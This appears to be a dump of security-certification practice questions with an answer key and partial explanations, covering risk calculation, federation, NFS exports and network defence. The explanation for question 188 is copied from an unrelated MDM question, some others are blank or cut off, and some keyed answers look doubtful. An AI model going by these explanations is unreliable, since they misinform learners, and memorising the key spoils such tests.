QUESTION NO: 434 A security architect is locked into a given cryptographic design based on the allowable software at the company. The key length for applications is already fixed as is the cipher and algorithm in use. The security architect advocates for the use of well-randomized keys as a mitigation to brute force and rainbow attacks. Which of the following is the security architect trying to increase in the design? A. Key stretching B. Availability C. Entropy D. Root of trust E. Integrity

Answer: C Explanation:

QUESTION NO: 444 A system administrator has a responsibility to maintain the security of the video teleconferencing system. During a self-audit of the video teleconferencing room, the administrator notices that speakers and microphones are hard-wired and wireless enabled. Which of the following security concerns should the system administrator have about the existing technology in the room? A. Wired transmissions could be intercepted by remote users. B. Bluetooth speakers could cause RF emanation concerns. C. Bluetooth is an unsecure communication channel. D. Wireless transmission causes interference with the video signal.

Answer: C Explanation:

QUESTION NO: 451 A security engineer has inherited an authentication project which integrates 1024-bit PKI certificates into the company infrastructure and now has a new requirement to integrate 2048-bit PKI certificates so that the entire company will be interoperable with its vendors when the project is completed. The project is now 25% complete, with 15% of the company staff being issued 1024- bit certificates. The provisioning of network based accounts has not occurred yet due to other project delays. The project is now expected to be over budget and behind its original schedule. Termination of the existing project and beginning a new project is a consideration because of the change in scope. Which of the following is the security engineer's MOST serious concern with implementing this solution? A. Succession planning B. Performance C. Maintainability D. Availability

Answer: C Explanation:

QUESTION NO: 156 During a recent audit of servers, a company discovered that a network administrator, who required remote access, had deployed an unauthorized remote access application that communicated over common ports already allowed through the firewall. A network scan showed that this remote access application had already been installed on one third of the servers in the company. Which of the following is the MOST appropriate action that the company should take to provide a more appropriate solution? A. Implement an IPS to block the application on the network B. Implement the remote application out to the rest of the servers C. Implement SSL VPN with SAML standards for federation D. Implement an ACL on the firewall with NAT for remote access

Answer: C Explanation: A Secure Sockets Layer (SSL) virtual private network (VPN) would provide the network administrator who requires remote access a secure and reliable method of accessing the system over the Internet. Security Assertion Markup Language (SAML) standards for federation will provide cross-web service authentication and authorization.

QUESTION NO: 217 An industry organization has implemented a system to allow trusted authentication between all of its partners. The system consists of a web of trusted RADIUS servers communicating over the Internet. An attacker was able to set up a malicious server and conduct a successful man-in-themiddle attack. Which of the following controls should be implemented to mitigate the attack in the future? A. Use PAP for secondary authentication on each RADIUS server B. Disable unused EAP methods on each RADIUS server C. Enforce TLS connections between RADIUS servers D. Use a shared secret for each pair of RADIUS servers

Answer: C Explanation: A man-in-the-middle attack is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other. One example is active eavesdropping, in which the attacker makes independent connections with the victims and relays messages between them to make them believe they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. As an attack that aims at circumventing mutual authentication, or lack thereof, a man-in-the-middle attack can succeed only when the attacker can impersonate each endpoint to their satisfaction as expected from the legitimate other end. Most cryptographic protocols include some form of endpoint authentication specifically to prevent MITM attacks. For example, TLS can authenticate one or both parties using a mutually trusted certification authority. Transport Layer Security (TLS) is a protocol that ensures privacy between communicating applications and their users on the Internet. When a server and client communicate, TLS ensures that no third party may eavesdrop or tamper with any message. TLS is the successor to the Secure Sockets Layer (SSL).

QUESTION NO: 193 An IT manager is working with a project manager to implement a new ERP system capable of transacting data between the new ERP system and the legacy system. As part of this process, both parties must agree to the controls utilized to secure data connections between the two enterprise systems. This is commonly documented in which of the following formal documents? A. Memorandum of Understanding B. Information System Security Agreement C. Interconnection Security Agreement D. Interoperability Agreement E. Operating Level Agreement

Answer: C Explanation: An interconnection security agreement (ISA) is a security document that derails the requirements for establishing, maintaining, and operating an interconnection between systems or networks. It specifies the requirements for connecting the systems and networks and details what security controls are co be used to protect the systems and sensitive data.

QUESTION NO: 224 After reviewing a company's NAS configuration and file system access logs, the auditor is advising the security administrator to implement additional security controls on the NFS export. The security administrator decides to remove the no_root_squash directive from the export and add the nosuid directive. Which of the following is true about the security controls implemented by the security administrator? A. The newly implemented security controls are in place to ensure that NFS encryption can only be controlled by the root user. B. Removing the no_root_squash directive grants the root user remote NFS read/write access to important files owned by root on the NAS. C. Users with root access on remote NFS client computers can always use the SU command to modify other user's files on the NAS. D. Adding the nosuid directive disables regular users from accessing files owned by the root user over NFS even after using the SU command.

Answer: C Explanation: If a user has root access, the user can log in with a non-root access account and then use the SU (Switch User) command to perform functions that require root access such as modifying other user's files on the NAS. By default, NFS shares change the root user to the nfsnobody user, an unprivileged user account. In this way, all root-created files are owned by nfsnobody, which prevents uploading of programs with the setuid bit set. If no_root_squash is used, remote root users are able to change any file on the shared file system and leave trojaned applications for other users to inadvertently execute. Some unix programs are called "suid" programs: They set the id of the person running them to whomever is the owner of the file. If a file is owned by root and is suid, then the program will execute as root, so that they can perform operations that only root is allowed to do. Using the nosuid option is a good idea and you should consider using this with all NFS mounted disks. It means that the server's root user cannot make a suid-root program on the file system, log in to the client as a normal user and then use the suid-root program to become root on the client too.

QUESTION NO: 98 The finance department for an online shopping website has discovered that a number of customers were able to purchase goods and services without any payments. Further analysis conducted by the security investigations team indicated that the website allowed customers to update a payment amount for shipping. A specially crafted value could be entered and cause a roll over, resulting in the shipping cost being subtracted from the balance and in some instances resulted in a negative balance. As a result, the system processed the negative balance as zero dollars. Which of the following BEST describes the application issue? A. Race condition B. Click-jacking C. Integer overflow D. Use after free E. SQL injection

Answer: C Explanation: Integer overflow errors can occur when a program fails to account for the fact that an arithmetic operation can result in a quantity either greater than a data type's maximum value or less than its minimum value.

QUESTION NO: 179 A security administrator was recently hired in a start-up company to represent the interest of security and to assist the network team in improving security in the company. The programmers are not on good terms with the security team and do not want to be distracted with security issues while they are working on a major project. Which of the following is the BEST time to make them address security issues in the project? A. In the middle of the project B. At the end of the project C. At the inception of the project D. At the time they request

Answer: C Explanation: It would be easier for the programmers to accommodate and address security concerns if they are made aware of the security issues at the start of the project. The security issues could affect the design of the solution. It would be better to address the security issues at the beginning of the project before the solution has been designed rather than change the design of the solution halfway through the project.

QUESTION NO: 187 A company has adopted a BYOD program. The company would like to protect confidential information. However, it has been decided that when an employee leaves, the company will not completely wipe the personal device. Which of the following would MOST likely help the company maintain security when employees leave? A. Require cloud storage on corporate servers and disable access upon termination B. Whitelist access to only non-confidential information C. Utilize an MDM solution with containerization D. Require that devices not have local storage

Answer: C Explanation: Mobile device management (MDM) is a type of security software used by an IT department to monitor, manage and secure employees' mobile devices that are deployed across multiple mobile service providers and across multiple mobile operating systems being used in the organization. A secure container, in a mobile security context, is an authenticated and encrypted area of an employee's device that separates sensitive corporate information from the owner's personal data and apps. The purpose of containerization is to prevent malware, intruders, system resources or other applications from interacting with the secured application and associated corporate data. Secure data containers are third-party mobile apps. The container acts as a storage area that is authenticated and encrypted by software and governed by corporate IT security policies. Such apps let IT enforce security policies on the same sensitive business data across different devices, which is especially useful because native device security capabilities vary. As BYOD (bring your own device) and consumerization trends have grown, the challenges involved in protecting both corporate data and user privacy have also increased. Containerization is one means of providing administrators with full control over corporate applications and data without affecting those of the user.

QUESTION NO: 188 An international shipping company discovered that deliveries left idle are being tampered with. The company wants to reduce the idle time associated with international deliveries by ensuring that personnel are automatically notified when an inbound delivery arrives at the transit dock. Which of the following should be implemented to help the company increase the security posture of its operations? A. Back office database B. Asset tracking C. Geo-fencing D. Barcode scanner

Answer: C Explanation: Mobile device management (MDM) is a type of security software used by an IT department to monitor, manage and secure employees' mobile devices that are deployed across multiple mobile service providers and across multiple mobile operating systems being used in the organization. A secure container, in a mobile security context, is an authenticated and encrypted area of an employee's device that separates sensitive corporate information from the owner's personal data and apps. The purpose of containerization is to prevent malware, intruders, system resources or other applications from interacting with the secured application and associated corporate data. Secure data containers are third-party mobile apps. The container acts as a storage area that is authenticated and encrypted by software and governed by corporate IT security policies. Such apps let IT enforce security policies on the same sensitive business data across different devices, which is especially useful because native device security capabilities vary. As BYOD (bring your own device) and consumerization trends have grown, the challenges involved in protecting both corporate data and user privacy have also increased. Containerization is one means of providing administrators with full control over corporate applications and data without affecting those of the user.

QUESTION NO: 124 Which of the following activities is commonly deemed "OUT OF SCOPE" when undertaking a penetration test? A. Test password complexity of all login fields and input validation of form fields B. Reverse engineering any thick client software that has been provided for the test C. Undertaking network-based denial of service attacks in production environment D. Attempting to perform blind SQL injection and reflected cross-site scripting attacks E. Running a vulnerability scanning tool to assess network and host weaknesses

Answer: C Explanation: Penetration testing is done to look at a network in an adversarial fashion with the aim of looking at what an attacker will use. Penetration testing is done without malice and undertaking a network- based denial of service attack in the production environment is as such 'OUT OF SCOPE'.

QUESTION NO: 151 A well-known retailer has experienced a massive credit card breach. The retailer had gone through an audit and had been presented with a potential problem on their network. Vendors were authenticating directly to the retailer's AD servers, and an improper firewall rule allowed pivoting from the AD server to the DMZ where credit card servers were kept. The firewall rule was needed for an internal application that was developed, which presents risk. The retailer determined that because the vendors were required to have site to site VPN's no other security action was taken. To prove to the retailer the monetary value of this risk, which of the following type of calculations is needed? A. Residual Risk calculation B. A cost/benefit analysis C. Quantitative Risk Analysis D. Qualitative Risk Analysis

Answer: C Explanation: Performing quantitative risk analysis focuses on assessing the probability of risk with a metric measurement which is usually a numerical value based on money or time. Topic 4, Integration of Computing, Communications and Business Disciplines

QUESTION NO: 227 An organization has several production critical SCADA supervisory systems that cannot follow the normal 30-day patching policy. Which of the following BEST maximizes the protection of these systems from malicious software? A. Configure a firewall with deep packet inspection that restricts traffic to the systems B. Configure a separate zone for the systems and restrict access to known ports C. Configure the systems to ensure only necessary applications are able to run D. Configure the host firewall to ensure only the necessary applications have listening ports

Answer: C Explanation: SCADA stands for supervisory control and data acquisition, a computer system for gathering and analyzing real time data. SCADA systems are used to monitor and control a plant or equipment in industries such as telecommunications, water and waste control, energy, oil and gas refining and transportation. If we cannot take the SCADA systems offline for patching, then the best way to protect these systems from malicious software is to reduce the attack surface by configuring the systems to ensure only necessary applications are able to run. The basic strategies of attack surface reduction are to reduce the amount of code running, reduce entry points available to untrusted users, and eliminate services requested by relatively few users. One approach to improving information security is to reduce the attack surface of a system or software. By turning off unnecessary functionality, there are fewer security risks. By having less code available to unauthorized actors, there will tend to be fewer failures. Although attack surface reduction helps prevent security failures, it does not mitigate the amount of damage an attacker could inflict once a vulnerability is found.

QUESTION NO: 112 A web services company is planning a one-time high-profile event to be hosted on the corporate website. An outage, due to an attack, would be publicly embarrassing, so Joe, the Chief Executive Officer (CEO), has requested that his security engineers put temporary preventive controls in place. Which of the following would MOST appropriately address Joe's concerns? A. Ensure web services hosting the event use TCP cookies and deny_hosts. B. Configure an intrusion prevention system that blocks IPs after detecting too many incomplete sessions. C. Contract and configure scrubbing services with third-party DDoS mitigation providers. D. Purchase additional bandwidth from the company's Internet service provider.

Answer: C Explanation: Scrubbing is an excellent way of dealing with this type of situation where the company wants to stay connected no matter what during the one-time high profile event. It involves deploying a multilayered security approach backed by extensive threat research to defend against a variety of attacks with a guarantee of always-on.

QUESTION NO: 115 Ann, a systems engineer, is working to identify an unknown node on the corporate network. To begin her investigative work, she runs the following nmap command string: user@hostname:~$ sudo nmap -O 192.168.1.54 Based on the output, nmap is unable to identify the OS running on the node, but the following ports are open on the device: TCP/22 TCP/111 TCP/512-514 TCP/2049 TCP/32778 Based on this information, which of the following operating systems is MOST likely running on the unknown node? A. Linux B. Windows C. Solaris D. OSX

Answer: C Explanation: TCP/22 is used for SSH; TCP/111 is used for Sun RPC; TCP/512-514 is used by CMD like exec, but automatic authentication is performed as with a login server, etc. These are all ports that are used when making use of the Sun Solaris operating system.

QUESTION NO: 180 An IT auditor is reviewing the data classification for a sensitive system. The company has classified the data stored in the sensitive system according to the following matrix: DATA TYPECONFIDENTIALITYINTEGRITYAVAILABILITY ------------------------------------------------------------------------------------------------------------------ FinancialHIGHHIGHLOW Client nameMEDIUMMEDIUMHIGH Client addressLOWMEDIUMLOW ------------------------------------------------------------------------------------------------------------------ AGGREGATEMEDIUMMEDIUMMEDIUM The auditor is advising the company to review the aggregate score and submit it to senior management. Which of the following should be the revised aggregate score? A. HIGH, MEDIUM, LOW B. MEDIUM, MEDIUM, LOW C. HIGH, HIGH, HIGH D. MEDIUM, MEDIUM, MEDIUM

Answer: C Explanation: The aggregate is incorrectly calculated as the average classification in this output. An aggregate is the sum of all items. As high is the highest level, and is present in all three categories, the aggregate should be high, high, high.

QUESTION NO: 149 An accountant at a small business is trying to understand the value of a server to determine if the business can afford to buy another server for DR. The risk manager only provided the accountant with the SLE of $24,000, ARO of 20% and the exposure factor of 25%. Which of the following is the correct asset value calculated by the accountant? A. $4,800 B. $24,000 C. $96,000 D. $120,000

Answer: C Explanation: The annualized loss expectancy (ALE) is the product of the annual rate of occurrence (ARO) and the single loss expectancy (SLE). It is mathematically expressed as: ALE = ARO x SLE Single Loss Expectancy (SLE) is mathematically expressed as: Asset value (AV) x Exposure Factor (EF) Thus if SLE = $ 24,000 and EF = 25% then the Asset value is SLE/EF = $ 96,000 References: http://www.financeformulas.net/Return_on_Investment.html https://en.wikipedia.org/wiki/Risk_assessment

QUESTION NO: 155 An analyst connects to a company web conference hosted on www.webconference.com/meetingID#01234 and observes that numerous guests have been allowed to join, without providing identifying information. The topics covered during the web conference are considered proprietary to the company. Which of the following security concerns does the analyst present to management? A. Guest users could present a risk to the integrity of the company's information. B. Authenticated users could sponsor guest access that was previously approved by management. C. Unauthenticated users could present a risk to the confidentiality of the company's information. D. Meeting owners could sponsor guest access if they have passed a background check.

Answer: C Explanation: The issue at stake in this question is confidentiality of information. Topics covered during the web conference are considered proprietary and should remain confidential, which means it should not be shared with unauthorized users.

QUESTION NO: 200 Company XYZ provides cable television services to several regional areas. They are currently installing fiber-to-the-home in many areas with hopes of also providing telephone and Internet services. The telephone and Internet services portions of the company will each be separate subsidiaries of the parent company. The board of directors wishes to keep the subsidiaries separate from the parent company. However all three companies must share customer data for the purposes of accounting, billing, and customer authentication. The solution must use open standards, and be simple and seamless for customers, while only sharing minimal data between the companies. Which of the following solutions is BEST suited for this scenario? A. The companies should federate, with the parent becoming the SP, and the subsidiaries becoming an IdP. B. The companies should federate, with the parent becoming the IdP, and the subsidiaries becoming an SSP. C. The companies should federate, with the parent becoming the IdP, and the subsidiaries becoming an SP. D. The companies should federate, with the parent becoming the ASP, and the subsidiaries becoming an IdP.

Answer: C Explanation: The question states that "all three companies must share customer data for the purposes of accounting, billing, and customer authentication". The simplest solution is a federated solution. In a federated solution, you have a single authentication provider. In this question, the parent company should be the authentication provider. The authentication provider is known as the IdP (Identity Provider). The IdP is the partner in a federation that creates security tokens for users. The other two subsidiaries, the telephone and Internet services providers will be the SP (Service Provider). The SP is the partner in a federation that consumes security tokens for providing access to applications.

QUESTION NO: 167 A company has received the contract to begin developing a new suite of software tools to replace an aging collaboration solution. The original collaboration solution has been in place for nine years, contains over a million lines of code, and took over two years to develop originally. The SDLC has been broken up into eight primary stages, with each stage requiring an in-depth risk analysis before moving on to the next phase. Which of the following software development methods is MOST applicable? A. Spiral model B. Incremental model C. Waterfall model D. Agile model

Answer: C Explanation: The waterfall model is a sequential software development processes, in which progress is seen as flowing steadily downwards through identified phases.

QUESTION NO: 198 A company Chief Information Officer (CIO) is unsure which set of standards should govern the company's IT policy. The CIO has hired consultants to develop use cases to test against various government and industry security standards. The CIO is convinced that there is large overlap between the configuration checks and security controls governing each set of standards. Which of the following selections represent the BEST option for the CIO? A. Issue a RFQ for vendors to quote a complete vulnerability and risk management solution to the company. B. Issue a policy that requires only the most stringent security standards be implemented throughout the company. C. Issue a policy specifying best practice security standards and a baseline to be implemented across the company. D. Issue a RFI for vendors to determine which set of security standards is best for the company.

Answer: C Explanation: There is large overlap between the configuration checks and security controls governing each set of standards (government standards and industry security standards). In other words, different sets of standards have many of the same requirements. A baseline implemented across the company that meets the overlapping requirements would meet the requirements of both sets of standards without the need for duplicate checks and controls. Therefore, you should create a policy specifying best practice security standards along with the baseline. Topic 5, Technical Integration of Enterprise Components

QUESTION NO: 215 Ann, a software developer, wants to publish her newly developed software to an online store. Ann wants to ensure that the software will not be modified by a third party or end users before being installed on mobile devices. Which of the following should Ann implement to stop modified copies of her software from running on mobile devices? A. Single sign-on B. Identity propagation C. Remote attestation D. Secure code review

Answer: C Explanation: Trusted Computing (TC) is a technology developed and promoted by the Trusted Computing Group. With Trusted Computing, the computer will consistently behave in expected ways, and those behaviors will be enforced by computer hardware and software. Enforcing this behavior is achieved by loading the hardware with a unique encryption key inaccessible to the rest of the system. Remote attestation allows changes to the user's computer to be detected by authorized parties. For example, software companies can identify unauthorized changes to software, including users tampering with their software to circumvent technological protection measures. It works by having the hardware generate a certificate stating what software is currently running. The computer can then present this certificate to a remote party to show that unaltered software is currently executing. Remote attestation is usually combined with public-key encryption so that the information sent can only be read by the programs that presented and requested the attestation, and not by an eavesdropper.

QUESTION NO: 208 A forensic analyst works for an e-discovery firm where several gigabytes of data are processed daily. While the business is lucrative, they do not have the resources or the scalability to adequately serve their clients. Since it is an e-discovery firm where chain of custody is important, which of the following scenarios should they consider? A. Offload some data processing to a public cloud B. Aligning their client intake with the resources available C. Using a community cloud with adequate controls D. Outsourcing the service to a third party cloud provider

Answer: C Explanation: We can use a cloud service to expand the compute resources. "Adequate controls" are controls that ensure that no one else including the cloud provider can access the data. A community cloud is a multi-tenant infrastructure that is shared among several organizations from a specific group with common computing concerns. Such concerns might be related to regulatory compliance, such as audit requirements, or may be related to performance requirements, such as hosting applications that require a quick response time, for example. The goal of a community cloud is to have participating organizations realize the benefits of a public cloud -- such as multi-tenancy and a pay-as-you-go billing structure -- but with the added level of privacy, security and policy compliance usually associated with a private cloud. The community cloud can be either on-premises or off-premises, and can be governed by the participating organizations or by a third-party managed service provider (MSP).

QUESTION NO: 134 A large company is preparing to merge with a smaller company. The smaller company has been very profitable, but the smaller company's main applications were created in-house. Which of the following actions should the large company's security administrator take in preparation for the merger? A. A review of the mitigations implemented from the most recent audit findings of the smaller company should be performed. B. An ROI calculation should be performed to determine which company's application should be used. C. A security assessment should be performed to establish the risks of integration or co-existence. D. A regression test should be performed on the in-house software to determine security risks associated with the software.

Answer: C Explanation: With any merger regardless of the monetary benefit there is always security risks and prior to the merger the security administrator should assess the security risks to as to mitigate these.

QUESTION NO: 192 An information security assessor for an organization finished an assessment that identified critical issues with the human resource new employee management software application. The assessor submitted the report to senior management but nothing has happened. Which of the following would be a logical next step? A. Meet the two key VPs and request a signature on the original assessment. B. Include specific case studies from other organizations in an updated report. C. Schedule a meeting with key human resource application stakeholders. D. Craft an RFP to begin finding a new human resource application.

Answer: C Explanation: You have submitted the report to senior management. It could be that the senior management are not that bothered about the HR application or they are just too busy to respond. This question is asking for the logical next step. The next step should be to inform people that are interested in the HR application about your findings. To ensure that the key human resource application stakeholders fully understand the implications of your findings, you should arrange a face-to-face meeting to discuss your report.

QUESTION NO: 109 Company XYZ has purchased and is now deploying a new HTML5 application. The company wants to hire a penetration tester to evaluate the security of the client and server components of the proprietary web application before launch. Which of the following is the penetration tester MOST likely to use while performing black box testing of the security of the company's purchased application? (Select TWO). A. Code review B. Sandbox C. Local proxy D. Fuzzer E. Port scanner

Answer: C,D Explanation: C: Local proxy will work by proxying traffic between the web client and the web server. This is a tool that can be put to good effect in this case. D: Fuzzing is another form of blackbox testing and works by feeding a program multiple input iterations that are specially written to trigger an internal error that might indicate a bug and crash it.

QUESTION NO: 104 In a situation where data is to be recovered from an attacker's location, which of the following are the FIRST things to capture? (Select TWO). A. Removable media B. Passwords written on scrap paper C. Snapshots of data on the monitor D. Documents on the printer E. Volatile system memory F. System hard drive

Answer: C,E Explanation: An exact copy of the attacker's system must be captured for further investigation so that the original data can remain unchanged. An analyst will then start the process of capturing data from the most volatile to the least volatile. The order of volatility from most volatile to least volatile is as follows:

QUESTION NO: 159 The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve company employees who call with computer-related problems. The helpdesk staff is currently unable to perform effective troubleshooting and relies on callers to describe their technology problems. Given that the helpdesk staff is located within the company headquarters and 90% of the callers are telecommuters, which of the following tools should the helpdesk manager use to make the staff more effective at troubleshooting while at the same time reducing company costs? (Select TWO). A. Web cameras B. Email C. Instant messaging D. BYOD E. Desktop sharing F. Presence

Answer: C,E Explanation: C: Instant messaging (IM) allows two-way communication in near real time, allowing users to collaborate, hold informal chat meetings, and share files and information. Some IM platforms have added encryption, central logging, and user access controls. This can be used to replace calls between the end-user and the helpdesk. E: Desktop sharing allows a remote user access to another user's desktop and has the ability to function as a remote system administration tool. This can allow the helpdesk to determine the cause of the problem on the end-users desktop.

QUESTION NO: 226 A software developer and IT administrator are focused on implementing security in the organization to protect OSI layer 7. Which of the following security technologies would BEST meet their requirements? (Select TWO). A. NIPS B. HSM C. HIPS D. NIDS E. WAF

Answer: C,E Explanation: OSI layer 7 is the application layer. To protect layer 7, we need to use application aware security devices such as Host-based Intrusion Prevention Systems (HIPS) or Web Application Firewalls (WAFs). An IPS generally sits in-line and watches network traffic as the packets flow through it. It acts similarly to an Intrusion Detection System (IDS) by trying to match data in the packets against a signature database or detect anomalies against what is pre-defined as "normal" traffic. In addition to its IDS functionality, an IPS can do more than log and alert. It can be programmed to react to what it detects. The ability to react to the detections is what makes IPSs more desirable than IDSs. There are still some drawbacks to an IPS. IPSs are designed to block certain types of traffic that it can identify as potentially bad traffic. IPSs do not have the ability to understand web application protocol logic. Hence, IPSs cannot fully distinguish if a request is normal or malformed at the application layer (OSI Layer 7). Host IPSs (HIPS) are a little more granular than network IPSs (NIPS). HIPS can monitor the application layer (OSI Layer 7), a little closer to the logic delivered to the web application. But HIPS still lacks some understanding of web application languages and logic. In response to these shortcomings, we are presented the Web Application Firewall. WAFs are designed to protect web applications/servers from web-based attacks that IPSs cannot prevent. In the same regards as an IPS, WAFs can be network or host based. They sit in-line and monitor traffic to and from web applications/servers. Basically, the difference is in the level of ability to analyze the Layer 7 web application logic.

QUESTION NO: 166 An organization has decided to reduce labor costs by outsourcing back office processing of credit applications to a provider located in another country. Data sovereignty and privacy concerns raised by the security team resulted in the third-party provider only accessing and processing the data via remote desktop sessions. To facilitate communications and improve productivity, staff at the third party has been provided with corporate email accounts that are only accessible via the remote desktop sessions. Email forwarding is blocked and staff at the third party can only communicate with staff within the organization. Which of the following additional controls should be implemented to prevent data loss? (Select THREE). A. Implement hashing of data in transit B. Session recording and capture C. Disable cross session cut and paste D. Monitor approved credit accounts E. User access audit reviews F. Source IP whitelisting

Answer: C,E,F Explanation: Data sovereignty is a legal concern where the data is governed by the laws of the country in which the data resides. In this scenario the company does not want the data to fall under the law of the country of the organization to whom back office process has be outsourced to. Therefore we must ensure that data can only be accessed on local servers and no copies are held on computers of the outsource partner. It is important therefore to prevent cut and paste operations. Privacy concerns can be addressed by ensuring the unauthorized users do not have access to the data. This can be accomplished though user access auditing, which needs to be reviewed on an ongoing basis; and source IP whitelisting, which is a list of IP addresses that are explicitly allowed access to the system.

QUESTION NO: 101 An insurance company has an online quoting system for insurance premiums. It allows potential customers to fill in certain details about their car and obtain a quote. During an investigation, the following patterns were detected: Pattern 1 - Analysis of the logs identifies that insurance premium forms are being filled in but only single fields are incrementally being updated. Pattern 2 - For every quote completed, a new customer number is created; due to legacy systems, customer numbers are running out. Which of the following is the attack type the system is susceptible to, and what is the BEST way to defend against it? (Select TWO). A. Apply a hidden field that triggers a SIEM alert B. Cross site scripting attack C. Resource exhaustion attack D. Input a blacklist of all known BOT malware IPs into the firewall E. SQL injection F. Implement an inline WAF and integrate into SIEM G. Distributed denial of service H. Implement firewall rules to block the attacking IP addresses

Answer: C,F Explanation: A resource exhaustion attack involves tying up predetermined resources on a system, thereby making the resources unavailable to others. Implementing an inline WAF would allow for protection from attacks, as well as log and alert admins to what's going on. Integrating in into SIEM allows for logs and other security-related documentation to be collected for analysis.

QUESTION NO: 372 Which of the following are components defined within an Enterprise Security Architecture Framework? (Select THREE). A. Implementation run-sheets B. Solution designs C. Business capabilities D. Solution architectures E. Business requirements documents F. Reference models G. Business cases H. Business vision and drivers

Answer: C,F,H Explanation:

QUESTION NO: 258 A process allows a LUN to be available to some hosts and unavailable to others. Which of the following causes such a process to become vulnerable? A. LUN masking B. Data injection C. Data fragmentation D. Moving the HBA

Answer: D Explanation:

QUESTION NO: 315 A security administrator must implement a SCADA style network overlay to ensure secure remote management of all network management and infrastructure devices. Which of the following BEST describes the rationale behind this architecture? A. A physically isolated network that allows for secure metric collection. B. A physically isolated network with inband management that uses two factor authentication. C. A logically isolated network with inband management that uses secure two factor authentication. D. An isolated network that provides secure out-of-band remote management.

Answer: D Explanation:

QUESTION NO: 435 Noticing latency issues at its connection to the Internet, a company suspects that it is being targeted in a Distributed Denial of Service attack. A security analyst discovers numerous inbound monlist requests coming to the company's NTP servers. Which of the following mitigates this activity with the LEAST impact to existing operations? A. Block in-bound connections to the company's NTP servers. B. Block IPs making monlist requests. C. Disable the company's NTP servers. D. Disable monlist on the company's NTP servers.

Answer: D Explanation:

QUESTION NO: 457 The sales team is considering the deployment of a new CRM solution within the enterprise. The IT and Security teams are members of the project; however, neither team has expertise or experience with the proposed system. Which of the following activities should be performed FIRST? A. Visit a company who already has the technology, sign an NDA, and read their latest risk assessment. B. Contact the top vendor, assign IT and Security to work together to implement a demo and pen test the system. C. Work with Finance to do a second ROI calculation before continuing further with the project. D. Research the market, select the top vendors and solicit RFPs from those vendors.

Answer: D Explanation:

QUESTION NO: 218 Joe, the Chief Executive Officer (CEO), was an Information security professor and a Subject Matter Expert for over 20 years. He has designed a network defense method which he says is significantly better than prominent international standards. He has recommended that the company use his cryptographic method. Which of the following methodologies should be adopted? A. The company should develop an in-house solution and keep the algorithm a secret. B. The company should use the CEO's encryption scheme. C. The company should use a mixture of both systems to meet minimum standards. D. The company should use the method recommended by other respected information security organizations.

Answer: D Explanation: In this question, we have one person's opinion about the best way to secure the network. His method may be more secure than other systems. However, for consensus of opinion, it is better to use the method recommended by other respected information security organizations. If the CEO's methods were the best methods, it is likely that the other respected information security organizations would have thought about them and would be using them. In other words, the methods recommended by other respected information security organizations are probably the best methods. Furthermore, if the company's systems need to communicate with external systems, the systems will need to use a 'standard' method otherwise the external system may not be able to decipher the communications from the company's systems.

QUESTION NO: 252 A team of security engineers has applied regulatory and corporate guidance to the design of a corporate network. The engineers have generated an SRTM based on their work and a thorough analysis of the complete set of functional and performance requirements in the network specification. Which of the following BEST describes the purpose of an SRTM in this scenario? A. To ensure the security of the network is documented prior to customer delivery B. To document the source of all functional requirements applicable to the network C. To facilitate the creation of performance testing metrics and test plans D. To allow certifiers to verify the network meets applicable security requirements

Answer: D Explanation:

QUESTION NO: 260 A large organization has gone through several mergers, acquisitions, and de-mergers over the past decade. As a result, the internal networks have been integrated but have complex dependencies and interactions between systems. Better integration is needed in order to simplify the underlying complexity. Which of the following is the MOST suitable integration platform to provide event-driven and standards-based secure software architecture? A. Service oriented architecture (SOA) B. Federated identities C. Object request broker (ORB) D. Enterprise service bus (ESB)

Answer: D Explanation:

QUESTION NO: 264 Several business units have requested the ability to use collaborative web-based meeting places with third party vendors. Generally these require user registration, installation of client-based ActiveX or Java applets, and also the ability for the user to share their desktop in read-only or read-write mode. In order to ensure that information security is not compromised, which of the following controls is BEST suited to this situation? A. Disallow the use of web-based meetings as this could lead to vulnerable client-side components being installed, or a malicious third party gaining read-write control over an internal workstation. B. Hire an outside consultant firm to perform both a quantitative and a qualitative risk-based assessment. Based on the outcomes, if any risks are identified then do not allow web-based meetings. If no risks are identified then go forward and allow for these meetings to occur. C. Allow the use of web-based meetings, but put controls in place to ensure that the use of these meetings is logged and tracked. D. Evaluate several meeting providers. Ensure that client-side components do not introduce undue security risks. Ensure that the read-write desktop mode can either be prevented or strongly audited.

Answer: D Explanation:

QUESTION NO: 265 A new web application system was purchased from a vendor and configured by the internal development team. Before the web application system was moved into production, a vulnerability assessment was conducted. A review of the vulnerability assessment report indicated that the testing team discovered a minor security issue with the configuration of the web application. The security issue should be reported to: A. CISO immediately in an exception report. B. Users of the new web application system. C. The vendor who supplied the web application system. D. Team lead in a weekly report.

Answer: D Explanation:

QUESTION NO: 266 A security consultant is hired by a company to determine if an internally developed web application is vulnerable to attacks. The consultant spent two weeks testing the application, and determines that no vulnerabilities are present. Based on the results of the tools and tests available, which of the following statements BEST reflects the security status of the application? A. The company's software lifecycle management improved the security of the application. B. There are no vulnerabilities in the application. C. The company should deploy a web application firewall to ensure extra security. D. There are no known vulnerabilities at this time.

Answer: D Explanation:

QUESTION NO: 269 An organization has had component integration related vulnerabilities exploited in consecutive releases of the software it hosts. The only reason the company was able to identify the compromises was because of a correlation of slow server performance and an attentive security analyst noticing unusual outbound network activity from the application servers. End-to-end management of the development process is the responsibility of the applications development manager and testing is done by various teams of programmers. Which of the following will MOST likely reduce the likelihood of similar incidents? A. Conduct monthly audits to verify that application modifications do not introduce new vulnerabilities. B. Implement a peer code review requirement prior to releasing code into production. C. Follow secure coding practices to minimize the likelihood of creating vulnerable applications. D. Establish cross-functional planning and testing requirements for software development activities.

Answer: D Explanation:

QUESTION NO: 270 A company has a single subnet in a small office. The administrator wants to limit non-web related traffic to the corporate intranet server as well as prevent abnormal HTTP requests and HTTP protocol anomalies from causing problems with the web server. Which of the following is the MOST likely solution? A. Application firewall and NIPS B. Edge firewall and HIDS C. ACLs and anti-virus D. Host firewall and WAF

Answer: D Explanation:

QUESTION NO: 277 An organization has had six security incidents over the past year against their main web application. Each time the organization was able to determine the cause of the incident and restore operations within a few hours to a few days. Which of the following provides the MOST comprehensive method for reducing the time to recover? A. Create security metrics that provide information on response times and requirements to determine the best place to focus time and money. B. Conduct a loss analysis to determine which systems to focus time and money towards increasing security. C. Implement a knowledge management process accessible to the help desk and finance departments to estimate cost and prioritize remediation. D. Develop an incident response team, require training for incident remediation, and provide incident reporting and tracking metrics.

Answer: D Explanation:

